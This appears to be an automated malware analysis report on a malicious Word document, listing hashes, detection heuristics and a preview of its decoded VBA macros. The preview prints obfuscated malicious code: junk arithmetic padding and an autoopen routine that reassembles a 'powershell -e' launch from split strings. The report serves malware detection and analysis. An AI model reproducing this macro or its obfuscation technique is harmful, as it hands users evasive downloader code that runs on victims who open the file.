Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 52dd153ad00295d5…

MALICIOUS

Office (OLE)

250.6 KB Created: 2019-03-14 12:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-17
MD5: 2bebea77dbd4508eaaec51f8f8c60b49 SHA-1: c88635b5816a88c673aa1d4c7dde95c25555c3ca SHA-256: 52dd153ad00295d51556ebc3221df7d3df1c9d7b9f34f8ee75c50caaee790c0d
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample is a malicious Office document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including OLE_VBA_SPLIT_KEYWORD_OBFUSCATION and OLE_VBA_PCODE_AUTOEXEC_EXEC. The presence of an AutoOpen macro suggests immediate execution upon opening. The script's complexity and obfuscation point towards a downloader or droppper functionality, aiming to fetch and execute further malicious content.

Heuristics 8

  • ClamAV: Doc.Malware.00536d-6903041-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.00536d-6903041-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 64532 bytes
SHA-256: ca69a065a1b2a841d0fba9fa9d39366d81d3259ee1b5db060da90cecfd4c23f8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wZABUoA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function zAGoAC()
   If jAAB4Ck_ = rBCxxQ_B Then
         ak44ZA = 271973695 * cGA_kQA
         SGAk4_c = HXDkAAX - 311258321 + 498257575 + CAGAoo * 286982383 / 516078218 + 94105495 / Chr(837151160 / CSng(489853335 + Round(w_BAUQ))) + 122260499 * Log(kkQ_Aw) - 510436255 - 288224202 + UkAAcc * CLng(KZAAA4oA - Atn(FAcA4A / 731970903 / 537057685 + YAxAA_X))
         dBDAAAk = 86982876 * I4A1AXo
End If
   If JA1cUA = bAcQwxA Then
         tDBA_ooA = 390620982 * o4AA4_
         VA_CAUD_ = wAU4wBD - 928939651 + 453057314 + VAcAA4 * 912772893 / 704456667 + 936515786 / Chr(922896790 / CSng(777368876 + Round(nAUAkDU))) + 388150530 * Log(WAZAUZc) - 674682276 - 7995171 + zQ_xAQA * CLng(YXAABDAA - Atn(QQAZBo / 778632288 / 462538646 + wAQBcQ))
         Gc4w41Aw = 296606634 * QDAoAA
End If
   If YcAQUDxA = mAAUAGxQ Then
         iwocAQZ = 955911392 * I_A_AAcA
         PQUAcA = lcAA4A - 326949912 + 250048041 + UAoAZBBA * 376028446 / 319911730 + 452654795 / Chr(516859524 / CSng(693005962 + Round(XAABCcD1))) + 492785305 * Log(vkoUAxZ) - 54049405 - 439670656 + MAAAAU * CLng(K1AwAZA - Atn(z1DDAA / 654984861 / 452070899 + IAxAAAwA))
         jAUkCA = 303672909 * moo4AkAA
End If
   If RUAUA_DD = HUQQQwk Then
         wAkAAGGo = 115552566 * wADAAXA
         UBBAAkw = hxUAQ4 - 436278587 + 197166145 + CBBcxAAA * 43459388 / 389595647 + 353931469 / Chr(583466002 / CSng(160181069 + Round(aDAwBG))) + 451858509 * Log(YAAkAQAw) - 293623494 - 245406835 + qBAB4AXA * CLng(sGAAwx - Atn(G4QUZG / 2829049 / 528975163 + ik1ADD))
         fUcoAAwA = 482275114 * pQUAckQ
End If
   If wXAAAAGA = wcGCxAAC Then
         XA4Uw4AA = 697964845 * wcQZDc
         fcXU1Q = SUXCZXQ - 513814839 + 315096524 + qBcQAX4 * 9521099 / 986334461 + 895065140 / Chr(458050695 / CSng(642702398 + Round(lABAA14))) + 976626671 * Log(XZxAQw) - 262281414 - 174873209 + YG4__XU * CLng(dAAQ1A - Atn(NAAABAUA / 250628265 / 179205135 + oA1AcA))
         SAABBU = 564206553 * lUAQAck
End If
   If dAGBBBc = iDBCQGo Then
         pCw4A4oD = 100878973 * CoxDAB
         ZAAwA1BB = CcAAGA - 539451088 + 151252842 + DGZQkX * 412628421 / 782350801 + 355877149 / Chr(501284377 / CSng(525050037 + Round(w_UDUA1))) + 839323189 * Log(wAo_oXDQ) - 271650352 - 880716801 + pAGkkoAw * CLng(TZGUc1B - Atn(ZxAQUAUQ / 591527399 / 74749 + pAkGCG))
         VABDUGDQ = 180568329 * kxXDAc
End If
End Function
Sub autoopen()
On Error Resume Next
   If XUAGBA = EUA_AB Then
         WBD4ADc = 990385443 * GAk1cA
         VxGcDU = rcBAUCwA - 377488494 + 892073252 + ikUABQ11 * 105425530 / 810215553 + 408378595 / Chr(910817880 / CSng(144536488 + Round(Oo__ADc))) + 516882644 * Log(wAXUGAD) - 733103024 - 604770596 + fwAQUc * CLng(iGcBZC - Atn(VAU44UxB / 631839586 / 125419897 + vAXQUkG))
         wADUZU = 746523243 * jAAcGUw
End If
   If LAAXAAAB = K4xAAcQ_ Then
         rUCABxD = 95290319 * BB_4ko
         bCDkUD = NUQADAA - 713433319 + 63857064 + uDAAQUAB * 339489101 / 121822882 + 413736791 / Chr(34219353 / CSng(771474290 + Round(wADUc4B))) + 283574407 * Log(cACwZQQ4) - 183848029 - 866024433 + nAA_ZBA * CLng(nDooQ4D - Atn(RAk_co / 302432888 / 627895022 + uA4DZ1x))
         aDABCD = 786895662 * SCAAAD
End If
   If NZXAkA = jwAAQ4 Then
         WAAwoDU = 320657427 * ND1ABxZA
         fA_AXAG = rAADDAoG - 204512792 + 435663659 + tAD_AAXG * 127361208 / 683411578 + 941046455 / Chr(6291819 / CSng(184945353 + Round(XBAwAAA))) + 773155148 * Log(zAAGA1U) - 427092998 - 682568189 + EQAB_kBA * CLng(vQQAkAXA - Atn(TokAoC / 11257610 / 782710298 + iZD_DQc))
         oAAXADU_ = 234040387 * JGQZQw
End If
WcCUBGox (PBBAoxD + "po" + JADBZAkx + "wersh" + LXkXAwA + "ell -e " + EAG1AA + ocA4cGA_ + UZA4AAAU + HowZGAQ + wCxZ_ACw + JAAAAw + h4BAADA)
   If ZA_AAB = bAAAADx Then
         q4UkBx1G = 261417769 * XAUoC__
         EkCQB
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.